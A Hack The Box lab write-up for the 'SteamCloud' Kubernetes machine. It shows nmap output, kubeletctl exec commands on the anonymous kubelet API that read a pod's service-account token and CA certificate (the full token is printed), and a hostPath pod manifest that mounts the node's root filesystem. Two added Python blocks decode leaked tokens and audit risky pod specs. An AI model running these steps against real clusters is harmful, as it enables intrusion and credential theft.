HTB-steamcloud-WriteUp
2025-03-28 22:00:37
Location: Guangxi

steamcloud

1. Start with a round of information gathering

─[sg-vip-2]─[10.10.14.3]─[yujiji@htb-nvhgx3u3nc]─[~]
└──╼ [★]$ nmap -p- -sV -sC 10.10.11.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 20:02 CST
Nmap scan report for 10.10.11.133
Host is up (0.22s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
2379/tcp  open  ssl/etcd-client?
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  h2
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-02-25T01:35:01
|_Not valid after:  2026-02-25T01:35:01
2380/tcp  open  ssl/etcd-server?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-02-25T01:35:01
|_Not valid after:  2026-02-25T01:35:01
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  h2
8443/tcp  open  ssl/https-alt
| tls-alpn:
|   h2
|_  http/1.1
|_http-title: Site doesn't have a title (application/json).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2025-02-24T01:35:00
|_Not valid after:  2028-02-25T01:35:00
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 403 Forbidden
|     Audit-Id: d8808abb-21d4-471b-9069-6c9ff0eb8322
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
|     Date: Tue, 25 Feb 2025 01:47:23 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest:
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 6346ac15-67b5-4c89-90a2-24cfc2412677
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
|     Date: Tue, 25 Feb 2025 01:47:22 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions:
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 14b00b28-9ce5-4135-abde-e49d9726ab47
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
|     Date: Tue, 25 Feb 2025 01:47:23 GMT
|     Content-Length: 189
|_   {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
10249/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=steamcloud@1740447302
| Subject Alternative Name: DNS:steamcloud
| Not valid before: 2025-02-25T00:35:02
|_Not valid after:  2026-02-25T00:35:02
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
10256/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.59 seconds

2. The scan results show this is a Kubernetes (k8s) cluster, so look up the relevant background

What each kubelet port does (10250), 51CTO blog: kubelet port 10250

3. Curling port 10250 reveals a large number of pods

curl -k https://10.10.11.133:10250/pods | jq .

4. List all the pods with kubeletctl

./kubeletctl_linux_amd64 pods --server 10.10.11.133


5. Use kubeletctl to scan for pods that allow command execution (RCE)

./kubeletctl_linux_amd64 --server 10.10.11.133 scan rce


6. Execute commands in the nginx pod


7. Read the nginx pod's service account token and CA certificate

./kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

./kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"


8. Use the obtained token and CA certificate to check our permissions with kubectl

Import the token:

export token="eyJhbGciOiJSUzI1NiIsImtpZCI6InZzZzhFMUw4eTZNYks1UGZPVmNXSGtFWHFENEhQTl9HZS1EZW5DR2JnbVkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzcxOTg2MjY0LCJpYXQiOjE3NDA0NTAyNjQsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImUzMjA4NGRjLWFjNjAtNDFjNC04NjFhLTIxOGIyNGQxOTVhZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6Ijg3MzYzZTA3LTQ1YWUtNDNlNC05NzA3LWFhMDY4MTlmMmU4ZCJ9LCJ3YXJuYWZ0ZXIiOjE3NDA0NTM4NzF9LCJuYmYiOjE3NDA0NTAyNjQsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Nz5JZBNDpL0tPsU_sRpfKexSrhZXgkB3kdVx72v6efSfXDuwlBnRcKHcEnFyAKN1DAtAkL49qlFRbnPLAlOHAn0Gz0iu9_k_qe8VY-lBiVLe2WDefZhe5VlprQXg3ufgu8DVkD6-xOChsaqaouFVyJhNQvyFPKipknpomTk0mX5h-cRrhPERKD1A9hcF1zDoOVjKcfqAZn8cNbQ9NYc5ywD5uXXFa0P7Qw5ETJeXwTS8KGW4JbLidoSS05JAezNL5-iV6ZqS6uALSIzioEBub9oJdQkqbjPeMI5wRe-iG9S5hvwVrc6__4L29kw-Xoi42pbt6QbuIjuLra01yQgoDQ"
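As an added defender-side example (not part of the original writeup), the following decodes the claims of a projected service-account token like the one read from the nginx pod above, without verifying the signature, so an incident responder can see which service account, namespace and pod a leaked token is bound to and how long it stays valid. The sample token is constructed inline with the same claim layout; its signature segment is a placeholder.

```python
import base64
import json


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_sa_token(token: str) -> dict:
    """Return the claims of a Kubernetes service-account JWT. The signature
    is NOT verified: this is for triage of a token already found in a pod,
    never for making authorization decisions."""
    _header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(payload))


def summarize_sa_token(token: str, now: int) -> dict:
    """Pull out the fields a responder cares about from a leaked token,
    judging remaining lifetime against `now` (a Unix timestamp)."""
    claims = decode_sa_token(token)
    k8s = claims.get("kubernetes.io", {})
    sa_name = k8s.get("serviceaccount", {}).get("name")
    return {
        "subject": claims.get("sub"),
        "namespace": k8s.get("namespace"),
        "service_account": sa_name,
        "pod": k8s.get("pod", {}).get("name"),
        "days_left": round((claims.get("exp", 0) - now) / 86400, 1),
        # A workload running as the namespace's default service account is
        # a common sign of an unscoped identity worth reviewing.
        "uses_default_sa": sa_name == "default",
    }


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Constructed sample with the same claim layout as a projected
# service-account token (placeholder signature, no real key involved).
_PAYLOAD = {
    "aud": ["https://kubernetes.default.svc.cluster.local"],
    "exp": 1771986264, "iat": 1740450264, "nbf": 1740450264,
    "iss": "https://kubernetes.default.svc.cluster.local",
    "kubernetes.io": {"namespace": "default", "pod": {"name": "nginx"},
                      "serviceaccount": {"name": "default"}},
    "sub": "system:serviceaccount:default:default",
}
SAMPLE_TOKEN = ".".join(_b64url_encode(part) for part in (
    json.dumps({"alg": "RS256", "kid": "sample"}).encode(),
    json.dumps(_PAYLOAD).encode(), b"placeholder-signature"))
```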

9. Check what we are allowed to do in the cluster with kubectl

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list


10. We are allowed to create pods, so the basic plan from here is: create a pod of our own, mount the host's filesystem into it, and then read it

11. Create the pod:

apiVersion: v1
kind: Pod
metadata:
  name: nginxt
  namespace: default
spec:
  containers:
  - name: nginxt
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f nginxt.yaml

Running get pods shows the pod was created successfully

kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p nginxt -c nginxt

Commands can then be run directly through kubeletctl.
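As an added defender-side example (not part of the writeup), the following audits a Pod manifest for exactly the primitives the nginxt pod above relies on: host namespaces, a hostPath volume onto the node root, a writable mount of it, and an automounted API token. These are roughly the checks the baseline Pod Security Standard or an admission webhook would apply before the apply step succeeds. The manifest is given as a parsed dict (what yaml.safe_load returns); the hardened counterpart is constructed for contrast.

```python
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home", "/proc", "/sys", "/var/run")


def audit_pod(pod: dict) -> list[str]:
    """Return findings for a Pod manifest given as a parsed dict (what
    yaml.safe_load returns); an empty list means nothing risky was found."""
    spec, findings = pod.get("spec", {}), []
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(f"HIGH {name}: {flag} shares a node namespace with the pod")
    if spec.get("automountServiceAccountToken", True):  # Kubernetes defaults this to true
        findings.append(f"INFO {name}: API token is mounted; confirm the pod needs API access")
    host_vols = {v["name"]: v["hostPath"]["path"] for v in spec.get("volumes", []) if "hostPath" in v}
    for vol_name, path in host_vols.items():
        norm = "/" + path.strip("/")  # "/" and "//" both mean the node root
        level = "CRITICAL" if norm == "/" or any(norm == p or norm.startswith(p + "/")
                                                  for p in SENSITIVE_HOST_PATHS) else "MEDIUM"
        findings.append(f"{level} {name}: hostPath volume {vol_name!r} exposes node path {path!r}")
    for c in spec.get("containers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in host_vols and not m.get("readOnly"):
                findings.append(f"HIGH {name}/{c['name']}: writable host mount at {m['mountPath']}")
    return findings


# The writeup's nginxt manifest, as the dict yaml.safe_load would produce.
NGINXT_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "nginxt", "namespace": "default"},
    "spec": {
        "containers": [{"name": "nginxt", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/root", "name": "mount-root-into-mnt"}]}],
        "volumes": [{"name": "mount-root-into-mnt", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

# Constructed hardened counterpart: no host namespaces, no hostPath, no token.
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "nginx-hardened", "namespace": "default"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{"name": "nginx", "image": "nginx:1.14.2",
                        "securityContext": {"allowPrivilegeEscalation": False}}],
    },
}
```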
